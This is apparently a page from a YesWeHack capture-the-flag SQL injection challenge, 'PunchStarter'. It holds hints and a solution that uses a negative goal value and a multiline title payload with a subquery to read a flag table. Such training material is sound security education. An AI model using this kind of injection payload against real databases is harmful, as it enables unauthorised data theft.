Sqlite3

PunchStarter

by YesWeHack
drag_indicator
info
drag_indicator
inputs
drag_indicator
inspect

PunchStarter

Welcome to PunchStarter, you own crowdfounded service!

Create a new project with a fixed goal and a cool title.

In this challenge you goal is to read the flag from flag(flag) using an SQL injection.

Good luck :)

Hints

Hint #1
expand_more

Both input seems to be well filtered, however the goal variable is used in a dangerous way.

Can you find what the mistake is?

Hint #2
expand_more

What append if you put a negative value as a goal?

Hint #3
expand_more

Now you need to fix the original request, and use a subquery to extract the flag.

Solution

Read the solution
expand_more

Use a negative goal to comment the end of the query

$goal = -42

Then use a multiline string to "fix" the request while stealing the flag, don't forget to comment the trailing quote.

$title =

This will be commented
1, 
(SELECT flag from flag )) --
drag_indicator
waf
INPUT
OUTPUT
drag_indicator
code
drag_indicator
result